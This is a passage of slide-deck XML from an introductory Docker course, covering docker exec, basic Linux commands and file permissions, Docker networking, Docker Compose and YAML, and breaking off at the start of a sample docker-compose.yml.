              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker exec &lt;contId/ContName&gt; &lt;command&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="274E13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker exec abcd1234 touch front.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="274E13"/>
              </a:solidFil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Basic Linux Commands</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1662" name="Google Shape;1662;p268"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237000" y="1088450"/>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PWD = Present Working Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ls -al </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	Permission String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        d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>rwxrwxrwx -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> -rwxrwxrwx   -&gt; file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> lrwxrwxrwx  -&gt; Symbolic links (Shortcut link)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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6" name="Shape 1666"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1667" name="Google Shape;1667;p269"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454300" y="575525"/>
            <a:ext cx="5986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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How container can talk to each other ?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1668" name="Google Shape;1668;p269"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009100" y="1017725"/>
            <a:ext cx="6789876" cy="3564675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1669" name="Google Shape;1669;p269"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706800" y="4486150"/>
            <a:ext cx="1545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rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1670" name="Google Shape;1670;p269"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5888988" y="4486150"/>
            <a:ext cx="1545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rPr>
              <a:t>Database</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1671" name="Google Shape;1671;p269"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="670492" y="3729992"/>
            <a:ext cx="832300" cy="832300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1672" name="Google Shape;1672;p269"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7533900" y="3616713"/>
            <a:ext cx="1058874" cy="1058874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1673" name="Google Shape;1673;p269"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3327488" y="3049125"/>
            <a:ext cx="22401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Docker network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1674" name="Google Shape;1674;p269"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434298" y="208000"/>
            <a:ext cx="1488000" cy="424142"/>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270"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="807600"/>
            <a:ext cx="8520600" cy="68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Docker Network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1680" name="Google Shape;1680;p270"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1838275"/>
            <a:ext cx="8520600" cy="21600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en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>A Docker network allows us to access the container’s ports without exposing them on the host.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFil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pic>
        <p:nvPicPr>
          <p:cNvPr id="1685" name="Google Shape;1685;p271"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15467" l="27340" r="27371" t="12724"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1916150" y="212875"/>
            <a:ext cx="5289398" cy="4717751"/>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272"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760825" y="1903700"/>
            <a:ext cx="5585100" cy="1579500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="116700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300" u="sng">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Compose file version 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="116700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Compose file version 2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1691" name="Google Shape;1691;p272"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717100" y="895975"/>
            <a:ext cx="7800600" cy="9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3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Compose</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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rgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker compose is a tool which read a docker-compose.yml file.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build the container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>according</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the commands/instructions provided in the file.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker compose  ( Installation not required on windows)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         Docker compose ( Installation is required on linux )</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418425" y="1971000"/>
            <a:ext cx="8520600" cy="10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520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basic Linux Commands</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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274"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1530900" y="923875"/>
            <a:ext cx="63891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900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose.yml</a:t>
            </a:r>
            <a:endParaRPr sz="4900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr sz="4900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose.yaml</a:t>
            </a:r>
            <a:endParaRPr sz="4900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="77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2250">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>YAML</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>YAML Ain't Markup Language</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:srgbClr val="5F6368"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="5F6368"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Yet Another Markup Lanage</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2250">
              <a:solidFill>
                <a:srgbClr val="5F6368"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1707" name="Google Shape;1707;p275"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8062" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2609200" y="1121900"/>
            <a:ext cx="3864825" cy="3837224"/>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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454550" y="895850"/>
            <a:ext cx="8520600" cy="7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320">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Practice</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1713" name="Google Shape;1713;p276"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454550" y="2127450"/>
            <a:ext cx="8520600" cy="888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3900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One service per container</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1718" name="Google Shape;1718;p277"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2496" l="4815" r="3289" t="2229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="832050" y="64050"/>
            <a:ext cx="7479898" cy="4925799"/>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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2413200" y="428375"/>
            <a:ext cx="4572000" cy="4316700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>version: '3.8'</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>services:</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
